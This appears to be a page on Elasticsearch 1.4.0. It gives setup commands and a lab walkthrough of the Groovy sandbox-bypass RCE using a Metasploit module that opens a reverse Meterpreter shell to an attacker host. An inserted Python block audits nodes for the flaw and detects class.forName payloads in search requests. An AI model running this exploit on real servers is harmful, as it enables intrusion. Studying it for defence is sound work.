Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0
Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.
Install
Please read the page.
Elasticsearch can be started using:
$ bin/elasticsearch
On *nix systems, the command will start the process in the foreground.
Running as a daemon
To run it in the background, add the -d switch to it:
$ bin/elasticsearch -d
PID
The Elasticsearch process can write its PID to a specified file on startup, making it easy to shut down the process later on:
$ bin/elasticsearch -d -p pid
$ kill `cat pid`
Exploit
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication, where the search function allows Groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
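As an added defender's check (not part of the original page or of the Metasploit module), the following Python audits a node against the two facts stated above: the bypass is reachable by default before 1.4.3, and it travels as a Groovy script inside an unauthenticated _search request. It assumes the 1.x elasticsearch.yml keys script.groovy.sandbox.enabled and script.disable_dynamic, and the sample request body is constructed, not captured traffic.

```python
"""Audit an Elasticsearch 1.x node for exposure to the Groovy sandbox bypass."""
import json
import re

# Per the text, exposure is the default before 1.4.3; from 1.4.3 on the Groovy
# sandbox ships disabled. Setting names below are an assumption about 1.x yml keys.
FIXED_VERSION = (1, 4, 3)


def parse_version(version: str) -> tuple:
    """Turn '1.4.2' into (1, 4, 2) so versions compare numerically, not lexically."""
    return tuple(int(p) for p in version.split(".")[:3])


def groovy_bypass_exposed(version: str, settings: dict) -> bool:
    """True when dynamic Groovy scripting is reachable over the unauthenticated REST API."""
    if settings.get("script.disable_dynamic") is True:
        return False  # dynamic scripts are rejected outright, sandbox or not
    if "script.groovy.sandbox.enabled" in settings:
        return bool(settings["script.groovy.sandbox.enabled"])  # explicit operator choice
    return parse_version(version) < FIXED_VERSION  # old default: sandbox on, bypassable


# Indicator of the technique named in the text: a script reflecting via class.forName.
_FORNAME = re.compile(r"\.class\.forName\s*\(")


def suspicious_search_request(path: str, body: str) -> bool:
    """Flag a _search request whose script fields use Groovy and reflect on classes."""
    if "_search" not in path:
        return False
    try:
        doc = json.loads(body)
    except ValueError:
        return _FORNAME.search(body) is not None  # malformed JSON still worth a look

    def walk(node) -> bool:
        if isinstance(node, dict):
            script = node.get("script")
            if isinstance(script, str) and _FORNAME.search(script):
                return node.get("lang", "groovy") == "groovy"  # Groovy is the 1.4 default lang
            return any(walk(v) for v in node.values())
        if isinstance(node, list):
            return any(walk(v) for v in node)
        return False

    return walk(doc)


# Constructed sample (not a captured exploit): the shape of a script_fields query.
SAMPLE_BODY = json.dumps({"size": 1, "script_fields": {
    "x": {"script": "java.lang.Math.class.forName(name)", "lang": "groovy"}}})
```

Feed real request bodies from a reverse proxy in front of port 9200 into suspicious_search_request; the version check alone is not enough once an operator has re-enabled the sandbox on a patched node.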
msf exploit(search_groovy_script) > show options
Module options (exploit/multi/elasticsearch/search_groovy_script):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST      192.168.1.102    yes       The target address
RPORT      9200             yes       The target port
SSL        false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The path to the ElasticSearch REST API
VHOST                       no        HTTP server virtual host
Exploit target:
Id  Name
--  ----
0   ElasticSearch 1.4.2
msf exploit(search_groovy_script) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Checking vulnerability...
[*] Discovering TEMP path...
[+] TEMP path on '/tmp'
[*] Discovering remote OS...
[+] Remote OS is 'Linux'
[*] Trying to load metasploit payload...
[*] Sending stage (46112 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.102:59238) at 2016-03-05 08:25:25 +0800
[+] Deleted /tmp/rCrwvV.jar
meterpreter > sysinfo
Computer : lab
OS : Linux 4.3.0-kali1-686-pae (i386)
Meterpreter : java/java
meterpreter >
References
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch
http://drops.wooyun.org/papers/5107